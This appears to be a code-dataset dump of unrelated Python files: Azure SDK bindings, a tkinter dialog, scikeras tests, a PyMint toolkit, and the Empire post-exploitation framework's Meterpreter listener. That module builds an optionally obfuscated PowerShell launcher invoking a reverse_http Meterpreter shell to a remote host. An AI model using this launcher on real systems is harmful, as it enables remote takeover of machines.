return pulumi.get(self, "exportable")
@exportable.setter
def exportable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "exportable", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def thumbprint(self) -> Optional[pulumi.Input[str]]:
"""
The thumbprint for the certificate.
"""
return pulumi.get(self, "thumbprint")
@thumbprint.setter
def thumbprint(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "thumbprint", value)
class Certificate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Automation Certificate.
## Import
Automation Certificates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/certificate:Certificate certificate1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/certificates/certificate1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: CertificateArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Automation Certificate.
## Import
Automation Certificates can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/certificate:Certificate certificate1 /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/certificates/certificate1
```
:param str resource_name: The name of the resource.
:param CertificateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(CertificateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = CertificateArgs.__new__(CertificateArgs)
if automation_account_name is None and not opts.urn:
raise TypeError("Missing required property 'automation_account_name'")
__props__.__dict__["automation_account_name"] = automation_account_name
if base64 is None and not opts.urn:
raise TypeError("Missing required property 'base64'")
__props__.__dict__["base64"] = base64
__props__.__dict__["description"] = description
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["exportable"] = None
__props__.__dict__["thumbprint"] = None
super(Certificate, __self__).__init__(
'azure:automation/certificate:Certificate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
base64: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
exportable: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
thumbprint: Optional[pulumi.Input[str]] = None) -> 'Certificate':
"""
Get an existing Certificate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] base64: Base64 encoded value of the certificate.
:param pulumi.Input[str] description: The description of this Automation Certificate.
:param pulumi.Input[str] name: Specifies the name of the Certificate. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] thumbprint: The thumbprint for the certificate.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _CertificateState.__new__(_CertificateState)
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["base64"] = base64
__props__.__dict__["description"] = description
__props__.__dict__["exportable"] = exportable
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["thumbprint"] = thumbprint
return Certificate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Output[str]:
"""
The name of the automation account in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@property
@pulumi.getter
def base64(self) -> pulumi.Output[str]:
"""
Base64 encoded value of the certificate.
"""
return pulumi.get(self, "base64")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The description of this Automation Certificate.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def exportable(self) -> pulumi.Output[bool]:
return pulumi.get(self, "exportable")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Certificate. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Certificate is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def thumbprint(self) -> pulumi.Output[str]:
"""
The thumbprint for the certificate.
"""
return pulumi.get(self, "thumbprint")
| 43.960298 | 237 | 0.66042 |
c41f9410283dfbbaf2f0f8fcdf2fbcc735347b24 | 5,484 | py | Python | lib/listeners/meterpreter.py | Gui-Luz/Empire | 6f5eeff5f46dd085e1317cb09b39853a2fce5d13 | [
"BSD-3-Clause"
] | 5,720 | 2017-02-02T13:59:40.000Z | 2022-03-31T09:50:10.000Z | lib/listeners/meterpreter.py | VookiBoo/Empire | 5aae31e7de591282773d2c8498af04ee4e8778f5 | [
"BSD-3-Clause"
] | 866 | 2017-02-02T10:56:31.000Z | 2020-01-17T07:47:05.000Z | lib/listeners/meterpreter.py | VookiBoo/Empire | 5aae31e7de591282773d2c8498af04ee4e8778f5 | [
"BSD-3-Clause"
] | 2,181 | 2017-02-04T10:28:41.000Z | 2022-03-31T04:36:56.000Z | # Empire imports
from lib.common import helpers
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Meterpreter',
'Author': ['@harmj0y'],
'Description': ("Starts a 'foreign' http[s] Meterpreter listener."),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'meterpreter'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
def default_response(self):
"""
Nothing needed to return here, as we're not actually starting the listener.
"""
return ''
def validate_options(self):
"""
Validate all options for this listener.
"""
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language or language.lower() != 'powershell':
print helpers.color('[!] listeners/http generate_launcher(): only PowerShell is supported at this time')
return None
if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
moduleSourcePath = "%s/data/module_source/code_execution/Invoke-Shellcode.ps1" % (self.mainMenu.installPath)
try:
f = open(moduleSourcePath, 'r')
except:
print helpers.color("[!] Could not read module source path at: %s" % (moduleSourcePath))
return ''
script = f.read()
f.close()
msfPayload = 'windows/meterpreter/reverse_http'
if 'https' in host:
msfPayload += 's'
if 'http' in host:
parts = host.split(':')
host = parts[1].strip('/')
port = parts[2].strip('/')
script = helpers.strip_powershell_comments(script)
script += "\nInvoke-Shellcode -Payload %s -Lhost %s -Lport %s -Force" % (msfPayload, host, port)
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, script, obfuscationCommand=obfuscationCommand)
return script
else:
print helpers.color("[!] listeners/meterpreter generate_launcher(): invalid listener name specification!")
def generate_stager(self, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
"""
Nothing to actually generate here for foreign listeners.
"""
print "generate_stager() not applicable for listeners/meterpreter"
pass
def generate_agent(self, language=None, obfuscate=False, obfuscationCommand=""):
"""
Nothing to actually generate here for foreign listeners.
"""
print "generate_stager() not applicable for listeners/meterpreter"
pass
def generate_comms(self, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
TODO: same generate_comms() as listeners/meterpreter, just different server config...
"""
if language:
if language.lower() == 'powershell':
# generate Get-Task / Send-Message
pass
elif language.lower() == 'python':
# send_message()
pass
else:
print helpers.color("[!] listeners/meterpreter generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.")
else:
print helpers.color('[!] listeners/meterpreter generate_comms(): no language specified!')
def start(self, name=''):
"""
Nothing to actually start for a foreign listner.
"""
return True
def shutdown(self, name=''):
"""
Nothing to actually shut down for a foreign listner.
"""
pass
| 33.851852 | 213 | 0.555981 |
08c4207fe226851d2e25416a2676a2e5750f278b | 2,010 | py | Python | pymandel/howto_dialog.py | semuconsulting/PyMandel | 5827a1f598060482d59d46f53cc5bee6ad1a6d9c | [
"BSD-3-Clause"
] | 5 | 2021-03-05T07:37:53.000Z | 2022-03-10T22:42:39.000Z | pymandel/howto_dialog.py | semuconsulting/PyMandel | 5827a1f598060482d59d46f53cc5bee6ad1a6d9c | [
"BSD-3-Clause"
] | 1 | 2021-05-21T04:29:45.000Z | 2021-05-21T13:44:12.000Z | pymandel/howto_dialog.py | semuconsulting/PyMandel | 5827a1f598060482d59d46f53cc5bee6ad1a6d9c | [
"BSD-3-Clause"
] | 2 | 2021-04-23T11:13:09.000Z | 2021-08-15T07:22:17.000Z | """
How To Dialog Box class for tkinter application.
Created on 19 Apr 2020
@author: semuadmin
"""
from tkinter import Toplevel, Label, Button, LEFT
from webbrowser import open_new_tab
from pymandel.strings import HELPTXT, COPYRIGHTTXT, DLGHOWTO, GITHUBURL
class HowtoDialog:
"""
How To dialog box class
"""
def __init__(self, app):
"""
Initialise Toplevel dialog
"""
self.__app = app # Reference to main application class
self.__master = self.__app.get_master() # Reference to root class (Tk)
self._dialog = Toplevel()
self._dialog.title = DLGHOWTO
self._dialog.geometry(
"+%d+%d"
% (self.__master.winfo_rootx() + 50, self.__master.winfo_rooty() + 50)
)
self._dialog.attributes("-topmost", "true")
self.body()
def body(self):
"""
Set up widgets
"""
# Create widgets
self.lbl_title = Label(self._dialog, text=DLGHOWTO)
self.lbl_title.config(font=("Verdana", 16))
self.lbl_desc = Label(self._dialog, justify=LEFT, text=HELPTXT, wraplength=500)
self.lbl_copyright = Label(
self._dialog, text=COPYRIGHTTXT, fg="blue", cursor="hand2"
)
self.btn_ok = Button(self._dialog, text="OK", width=8, command=self.ok_press)
# Arrange widgets
self.lbl_title.grid(column=0, row=0, padx=5, pady=5)
self.lbl_desc.grid(column=0, row=2, padx=5, pady=5)
self.lbl_copyright.grid(column=0, row=3, padx=5, pady=5)
self.btn_ok.grid(column=0, row=5, ipadx=3, ipady=3, padx=5, pady=5)
# Bind commands and hotkeys
self.lbl_copyright.bind("<Button-1>", lambda e: open_new_tab(GITHUBURL))
self.btn_ok.bind("<Return>", self.ok_press)
self.btn_ok.focus_set()
def ok_press(self, *args, **kwargs):
"""
Handle OK button press
"""
self.__master.update_idletasks()
self._dialog.destroy()
| 28.309859 | 87 | 0.60995 |
8fc919f16bd8a2537f14121e5a3782149aa15e6b | 2,126 | py | Python | tests/test_utils.py | metasyn/scikeras | cb422fdd4f5c592feb71ce155fa25f26b25cdd82 | [
"MIT"
] | 111 | 2020-06-16T16:14:09.000Z | 2022-03-28T14:28:28.000Z | tests/test_utils.py | metasyn/scikeras | cb422fdd4f5c592feb71ce155fa25f26b25cdd82 | [
"MIT"
] | 240 | 2020-07-13T15:51:34.000Z | 2022-03-29T07:46:09.000Z | tests/test_utils.py | metasyn/scikeras | cb422fdd4f5c592feb71ce155fa25f26b25cdd82 | [
"MIT"
] | 16 | 2020-07-13T14:41:17.000Z | 2022-03-19T11:50:02.000Z | import numpy as np
import pytest
from tensorflow.keras import losses as losses_module
from tensorflow.keras import metrics as metrics_module
from scikeras.utils import loss_name, metric_name
class CustomLoss(losses_module.Loss):
pass
class CustomMetric(metrics_module.AUC):
pass
@pytest.mark.parametrize(
"obj",
[
"categorical_crossentropy",
"CategoricalCrossentropy",
losses_module.categorical_crossentropy,
losses_module.CategoricalCrossentropy,
losses_module.CategoricalCrossentropy(),
],
)
def test_loss_invariance(obj):
"""Test to make sure loss_name returns same string no matter which object
is passed (str, function, class, type)"""
assert loss_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("obj", [CustomLoss, CustomLoss()])
def test_custom_loss(obj):
assert loss_name(obj) == "custom_loss"
@pytest.mark.parametrize(
"obj",
[
"categorical_crossentropy",
"CategoricalCrossentropy",
metrics_module.categorical_crossentropy,
metrics_module.CategoricalCrossentropy,
metrics_module.CategoricalCrossentropy(),
],
)
def test_metric_invariance(obj):
"""Test to make sure same metric returned no matter which object passed"""
assert metric_name(obj) == "categorical_crossentropy"
@pytest.mark.parametrize("loss", [object(), object, list()])
def test_loss_types(loss):
with pytest.raises(TypeError, match="``loss`` must be a"):
loss_name(loss)
def test_unknown_loss_raises():
with pytest.raises(ValueError, match="Unknown loss function"):
loss_name("unknown_loss")
@pytest.mark.parametrize("obj", [object(), object, list()])
def test_metric_types(obj):
with pytest.raises(TypeError, match="``metric`` must be a"):
metric_name(obj)
def test_unknown_metric():
with pytest.raises(ValueError, match="Unknown metric function"):
metric_name("unknown_metric")
@pytest.mark.parametrize("metric", [CustomMetric, CustomMetric()])
def test_custom_metric(metric):
assert metric_name(metric) == "custom_metric"
| 26.911392 | 78 | 0.718721 |
ee89243e8d1e3a7bb4b043e5b247159988ddb6ad | 12,865 | py | Python | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2020_08_01_preview/aio/operations/_management_policies_operations.py | ankitarorabit/azure-sdk-for-python | dd90281cbad9400f8080754a5ef2f56791a5a88f | [
"MIT"
] | 3 | 2020-06-23T02:25:27.000Z | 2021-09-07T18:48:11.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2020_08_01_preview/aio/operations/_management_policies_operations.py | ankitarorabit/azure-sdk-for-python | dd90281cbad9400f8080754a5ef2f56791a5a88f | [
"MIT"
] | 510 | 2019-07-17T16:11:19.000Z | 2021-08-02T08:38:32.000Z | sdk/storage/azure-mgmt-storage/azure/mgmt/storage/v2020_08_01_preview/aio/operations/_management_policies_operations.py | ankitarorabit/azure-sdk-for-python | dd90281cbad9400f8080754a5ef2f56791a5a88f | [
"MIT"
] | 5 | 2019-09-04T12:51:37.000Z | 2020-09-16T07:28:40.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class ManagementPoliciesOperations:
"""ManagementPoliciesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.storage.v2020_08_01_preview.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def get(
self,
resource_group_name: str,
account_name: str,
management_policy_name: Union[str, "_models.ManagementPolicyName"],
**kwargs
) -> "_models.ManagementPolicy":
"""Gets the managementpolicy associated with the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param management_policy_name: The name of the Storage Account Management Policy. It should
always be 'default'.
:type management_policy_name: str or ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicyName
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagementPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagementPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'managementPolicyName': self._serialize.url("management_policy_name", management_policy_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagementPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/managementPolicies/{managementPolicyName}'} # type: ignore
async def create_or_update(
self,
resource_group_name: str,
account_name: str,
management_policy_name: Union[str, "_models.ManagementPolicyName"],
properties: "_models.ManagementPolicy",
**kwargs
) -> "_models.ManagementPolicy":
"""Sets the managementpolicy to the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param management_policy_name: The name of the Storage Account Management Policy. It should
always be 'default'.
:type management_policy_name: str or ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicyName
:param properties: The ManagementPolicy set to a storage account.
:type properties: ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicy
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ManagementPolicy, or the result of cls(response)
:rtype: ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicy
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ManagementPolicy"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'managementPolicyName': self._serialize.url("management_policy_name", management_policy_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(properties, 'ManagementPolicy')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ManagementPolicy', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/managementPolicies/{managementPolicyName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
account_name: str,
management_policy_name: Union[str, "_models.ManagementPolicyName"],
**kwargs
) -> None:
"""Deletes the managementpolicy associated with the specified storage account.
:param resource_group_name: The name of the resource group within the user's subscription. The
name is case insensitive.
:type resource_group_name: str
:param account_name: The name of the storage account within the specified resource group.
Storage account names must be between 3 and 24 characters in length and use numbers and
lower-case letters only.
:type account_name: str
:param management_policy_name: The name of the Storage Account Management Policy. It should
always be 'default'.
:type management_policy_name: str or ~azure.mgmt.storage.v2020_08_01_preview.models.ManagementPolicyName
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-08-01-preview"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=24, min_length=3),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str', min_length=1),
'managementPolicyName': self._serialize.url("management_policy_name", management_policy_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Storage/storageAccounts/{accountName}/managementPolicies/{managementPolicyName}'} # type: ignore
| 52.942387 | 225 | 0.691799 |
412b244d2e26056543472e9371dbc89632e32a4b | 87,357 | py | Python | build/lib/pymint/main/interpret_toolkit.py | monte-flora/py-mint | 0dd22a2e3dce68d1a12a6a99623cb4d4cb407b58 | [
"MIT"
] | 9 | 2021-04-12T16:11:38.000Z | 2022-03-18T09:03:58.000Z | build/lib/pymint/main/interpret_toolkit.py | monte-flora/py-mint | 0dd22a2e3dce68d1a12a6a99623cb4d4cb407b58 | [
"MIT"
] | 21 | 2021-04-13T01:17:40.000Z | 2022-03-11T16:06:50.000Z | build/lib/pymint/main/interpret_toolkit.py | monte-flora/mintpy | 23f9a952726dc0e69dfcdda2f8c7c27858aa9a11 | [
"MIT"
] | 1 | 2021-11-15T20:56:46.000Z | 2021-11-15T20:56:46.000Z | import numpy as np
import xarray as xr
import pandas as pd
import itertools
# Computation imports
from ..common.attributes import Attributes
from .local_interpret import LocalInterpret
from .global_interpret import GlobalInterpret
# Plotting imports
from ..plot.plot_interpret_curves import PlotInterpretCurves
from ..plot.plot_permutation_importance import PlotImportance
from ..plot.plot_feature_contributions import PlotFeatureContributions
from ..plot.plot_2D import PlotInterpret2D
from ..plot._box_and_whisker import box_and_whisker
from ..plot._kde_2d import PlotScatter
from ..common.utils import (
to_xarray,
get_indices_based_on_performance,
retrieve_important_vars,
load_netcdf,
load_dataframe,
save_netcdf,
save_dataframe,
combine_top_features,
determine_feature_dtype,
is_str,
is_list,
is_dataset,
is_dataframe,
)
class InterpretToolkit(Attributes):
"""
InterpretToolkit is the primary interface of PyMint. The modules contained within compute several
interpretable machine learning (IML) methods such as
Feature importance:
* `permutation_importance`
* `ale_variance`
Feature Attributions:
- `ale`
- `pd`
- `ice`
- `shap`
- `local_contributions`
Feature Interactions:
- `interaction_strength`
- `ale_variance`
- `perm_based_interaction`
- `friedman_h_stat`
- `main_effect_complexity`
- `ale`
- `pd`
Additionally, there are corresponding plotting modules for
each IML method, which are designed to produce publication-quality graphics.
.. note::
InterpretToolkit is designed to work with estimators that implement predict or predict_proba.
.. caution::
InterpretToolkit is only designed to work with binary classification and regression problems.
In future versions of PyMint, we hope to be compatiable with multi-class classification.
Parameters
-----------
estimators : list of tuples of (estimator name, fitted estimator)
Tuple of (estimator name, fitted estimator object) or list thereof where the
fitted estimator must implement ``predict`` or ``predict_proba``.
Multioutput-multiclass classifiers are not supported.
X : {array-like or dataframe} of shape (n_samples, n_features)
Training or validation data used to compute the IML methods.
If ndnumpy.array, must specify `feature_names`.
y : {list or numpy.array} of shape (n_samples,)
The target values (class labels in classification, real numbers in regression).
estimator_output : ``"raw"`` or ``"probability"``
What output of the estimator should be explained. Determined internally by
InterpretToolkit. However, if using a classification model, the user
can set to "raw" for non-probabilistic output.
feature_names : array-like of shape (n_features,), dtype=str, default=None
Name of each feature; ``feature_names[i]`` holds the name of the feature
with index ``i``. By default, the name of the feature corresponds to their numerical
index for NumPy array and their column name for pandas dataframe.
Feature names are only required if ``X`` is an ndnumpy.array, a it will be
converted to a pandas.DataFrame internally.
Raises
---------
AssertError
Number of estimator objects is not equal to the number of estimator names given!
TypeError
y variable must be numpy array or pandas.DataFrame.
Exception
Feature names must be specified if X is an numpy.array.
ValueError
estimator_output is not an accepted option.
"""
def __init__(self, estimators=None,
X=pd.DataFrame(np.array([])),
y=np.array([]),
estimator_output=None,
feature_names=None):
if estimators is not None:
if not is_list(estimators) and estimators:
estimators = [estimators]
estimator_names = [e[0] for e in estimators]
estimators = [e[1] for e in estimators]
else:
estimator_names = None
self.set_estimator_attribute(estimators, estimator_names)
self.set_y_attribute(y)
self.set_X_attribute(X, feature_names)
self.set_estimator_output(estimator_output, estimators)
self.checked_attributes = True
# Initialize a global interpret object
self.global_obj = GlobalInterpret(estimators=self.estimators,
estimator_names=self.estimator_names,
X=self.X,
y =self.y,
estimator_output=self.estimator_output,
checked_attributes=self.checked_attributes)
# Initialize a local interpret object
self.local_obj = LocalInterpret(estimators=self.estimators,
estimator_names=self.estimator_names,
X=self.X,
y=self.y,
estimator_output=self.estimator_output,
checked_attributes=self.checked_attributes
)
self.attrs_dict = {
'estimator_output' : self.estimator_output,
'estimators used' : self.estimator_names
}
def __repr__(self):
return 'InterpretToolkit(estimator=%s \n \
estimator_names=%s \n \
X=%s length:%d \n \
